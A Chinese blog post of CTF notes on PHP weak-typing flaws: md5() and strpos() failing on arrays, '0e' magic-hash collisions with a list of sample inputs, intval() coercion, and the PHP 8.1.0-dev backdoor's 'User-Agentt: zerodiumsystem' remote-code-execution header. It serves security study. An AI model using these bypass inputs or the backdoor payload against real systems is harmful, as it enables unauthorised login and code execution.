php漏洞

已于 2022-10-08 20:53:27 修改
阅读量228 收藏
点赞数
文章标签: php mysql 开发语言
于 2019-12-12 14:54:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43784056/article/details/84500875
版权

在PHP中,MD5,sha1是不能处理数组的,md5(数组)会返回null,所以md5(a[])==null,md5(b[])==null,md5(a[])=md5(b[])=null.

http://ctf5.shiyanbar.com/web/false.php?name[]=a&password[]=b

PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。

攻击者可以利用这一漏洞,通过输入一个经过哈希后以”0E”开头的字符串,即会被PHP解释为0,如果数据库中存在这种哈希值以”0E”开头的密码的话,他就可以以这个用户的身份登录进去,尽管并没有真正的密码。

0e开头的md5和原值:

QNKCDZO
0e830400451993494058024219903391
240610708
0e462097431906509019562988736854
s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s155964671a
0e342768416822451524974117254469
s1184209335a
0e072485820392773389523109082030
s1665632922a
0e731198061491163073197128363787
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752
s1091221200a
0e940624217856561557816327384675
s155964671a
0e342768416822451524974117254469
s1502113478a
0e861580163291561247404381396064
s155964671a
0e342768416822451524974117254469
s1665632922a
0e731198061491163073197128363787
s155964671a
0e342768416822451524974117254469
s1091221200a
0e940624217856561557816327384675
s1836677006a
0e481036490867661113260034900752
s1885207154a
0e509367213418206700842008763514
s532378020a
0e220463095855511507588041205815
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s214587387a
0e848240448830537924465865611904
s1502113478a
0e861580163291561247404381396064
s1091221200a
0e940624217856561557816327384675
s1665632922a
0e731198061491163073197128363787
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s1665632922a
0e731198061491163073197128363787
s878926199a
0e545993274517709034328855841020

intval函数把参数转换为数字的时候,有点像php的==,这篇文章PHP弱类型总结 - 梁十安 - 博客园,最开始有数字就是转化为那几个数字的值,没有就是0,比如

intval('123asdas123')===>123
intval('aaaasdas123')===>0

这里记录CGCTF的一个题目,源码如下

<?php
if($_GET[id]) {
   mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
  mysql_select_db(SAE_MYSQL_DB);
  $id = intval($_GET[id]);
  $query = @mysql_fetch_array(mysql_query("select content from ctf2 where id='$id'"));
  if ($_GET[id]==1024) {
      echo "<p>no! try again</p>";
  }
  else{
    echo($query[content]);
  }
}
?>

这里传值id=1024.2,传个小数就行

erge和strpos函数漏洞,不能处理数组,这里也用一道CGCTF的题来讲解,源码如下

if (isset ($_GET['nctf'])) {
        if (@ereg ("^[1-9]+$", $_GET['nctf']) === FALSE)
            echo '必须输入数字才行';
        else if (strpos ($_GET['nctf'], '#biubiubiu') !== FALSE)   
            die('Flag: '.$flag);
        else
            echo '骚年,继续努力吧啊~';
    }

传入nctf[]=,就可以绕过两个函数,得到flag

PHP 8.1.0-dev 版本在2021年3月28日被植入后门,当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。

影响范围:PHP 8.1.0-dev

payload:User-Agentt: zerodiumsystem("id");

主要通过修改payload中User-Agentt: zerodium后面的php代码来达到想要的效果,详细内容:PHP-8.1.0-dev 后门命令执行漏洞复现_ImShadowven的博客-CSDN博客

后面继续记录,遇到什么记录什么

0ne_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php 漏洞_十大PHP安全漏洞
culi4814的博客
08-11 1738
php 漏洞Security is not a list of things you do. Security is a way of thinking, a way of looking at things, a way of dealing with the world that says “I don’t know how they’ll do it, but I know they’re ...
php漏洞大全
03-09
PHP网页的安全性问题   针对PHP的网站主要存在下面几种攻击方式:   1.命令注入(Command Injection)   2.eval注入(Eval Injection)   3.客户端脚本攻击(script Insertion)   4.跨网站脚本攻击(Cross Site scripting, XSS)   5.SQL注入攻击(SQL injection)   6.跨网站请求伪造攻击(Cross Site Request Forgeries, CSRF)   7.Session 会话劫持(Session Hijacking)   8.Session 固定攻击(Session Fixation)   9.HTTP响应拆分攻击(HTTP Response Splitting)   10.文件上传漏洞(File Upload Attack)   11.目录穿越漏洞(Directory Traversal)   12.远程文件包含攻击(Remote Inclusion)   13.动态函数注入攻击(Dynamic Variable Evaluation)   14.URL攻击(URL attack)   15.表单提交欺骗攻击(Spoofed Form Submissions)   16.HTTP请求欺骗攻击(Spoofed HTTP Requests)   几个重要的php.ini选项
php漏洞与代码审计
anjuzi的专栏
06-06 571
在甲方公司做代码审计一般还是以白盒为主,漏洞无非这么几类,XSS、sql注入、命令执行、上传漏洞、本地包含、远程包含、权限绕过、信息泄露等。 1.xss + sql注入 其中占大头的自然是XSS与SQL注入,对于框架类型或者有公共文件的,建议在公共文件中统一做一次XSS和SQL注入的过滤。写个过滤函数,可由如下所示: $_REQUEST = filter_xss($_
常见的 php 漏洞
热门推荐
国内某知名游戏公司小菜鸡工程师
11-19 1万+
关注漏洞,关注网络安全
PHP漏洞全解
HarveyCheng的专栏
04-17 889
命令注入攻击 PHP中可以使用下列5个函数来执行外部的应用程序或函数 system、exec、passthru、shell_exec、“(与shell_exec功能相同) 函数原型 string system(string command, int &return_var)         command 要执行的命令          return_var 存放执行命令的执行后的状态
PHP漏洞全解1-9.pdf
06-23
PHP漏洞全解1-9.pdf
PHP漏洞全解1-9
09-16
PHP 漏洞全解( 一)-PHP 网页的安全性问题 针对 PHP 的网站主要存在下面几种攻击方式: 1、命令注入(Command Injection) 2、eval 注入(Eval Injection) 3、客户端脚本攻击(Script Insertion) 4、跨网站脚本攻击(Cross ...
PHP漏洞大全
07-24
PHP漏洞的一些描述而已,详细的还是自己去学习
PHP漏洞挖掘
10-21
20条途径挖掘PHP漏洞,请各位看看。大概有用吧
PHP程序中的常见漏洞
KHN_Fire的博客
03-07 506
由于原文比较长,而且有相当一部分是介绍文章的背景或PHP的基础知识,没有涉及到PHP安全方面的内容,因此我没有翻译。如果你想了解这方面的知识,请参考原文。   文章主要从全局变量,远程文件,文件上载,库文件,Session文件,数据类型和容易出错的函数这几个方面分析了PHP的安全性,并且对如何增强PHP的安全性提出了一些有用的建议。   好了,废话少说,我们言归正传!   [全局
php中使用in_array易产生代码安全漏洞
温柔手的专栏
06-07 3227
执行上面的代码看看,你想说什么?我是惊出了冷汗的in_array常被老手们这样用做变量检查,但显然结果并不靠谱。为什么会这样呢?再试试这个问题似乎是PHP的默认类型转换造成的,数字与字符串比较时,字符串先被强制转成数字再进行了比较。真的是这个原因吗?爱较真的朋友请自行查看PHP源码,没准你还会发现其他问题。其实in_array
php-MD5漏洞
cainiao17441898的博客
05-17 494
前言 PHP处理哈希字符串时,会利用”!=”或””来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。 $_SERVER[‘REQUEST_URI’]:会获取URL地址 strstr — 查找字符串的首次出现,返回该字符串及后面剩余部分 parse_str() 函数把查询字符串解析到变量中 substr() 方法可在字符串中抽取从 start 下标开始的指定数目的字符,语法:stringObj
PHP+MYSQL 【注入漏洞】攻防测试
weixin_34124939的博客
11-20 248
2019独角兽企业重金招聘Python工程师标准>>> ...
PHP常见漏洞的防范措施
大鹏
12-18 1964
一、常见PHP网站安全漏洞 对于PHP漏洞,目前常见的漏洞有五种。分别是Session文件漏洞、SQL注入漏洞、脚本命令执行漏洞、全局变量漏洞和文件漏洞。这里分别对这些漏洞进行简要的介绍。 1、session文件漏洞 Session攻击是黑客最常用到的攻击手段之一。当一个用户访问某一个网站时,为了免客户每进人一个页面都要输人账号和密码PHP设置了Session和Cookie用
PHP网站常见一些安全漏洞及防御方法_php
最新发布
liuhyusb的博客
01-02 505
一、常见PHP网站安全漏洞对于PHP漏洞,目前常见的漏洞有五种。分别是Session文件漏洞、SQL注入漏洞、脚本命令执行漏洞、全局变量漏洞和文件漏洞。这里分别对这些漏洞进行简要的介绍。1、session文件漏洞Session攻击是黑客最常用到的攻击手段之一。当一个用户访问某一个网站时,为了免客户每进人一个页面都要输人账号和密码PHP设置了Session和Cookie用于方便用户的使用和访向。2、SQL注入漏洞
PHP常见函数漏洞
Elite的博客
04-11 2442
常见的PHP特性(bug)总结,干货满满哦
pdotrait.php漏洞
10-02
pdotrait.php漏洞是指在使用PDO扩展进行数据库操作时存在的一种安全漏洞。PDO(PHP Data Objects)是PHP中的一个数据库抽象层,用于连接不同类型的数据库并执行数据库操作。 pdotrait.php漏洞的主要原因是在PDO扩展...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值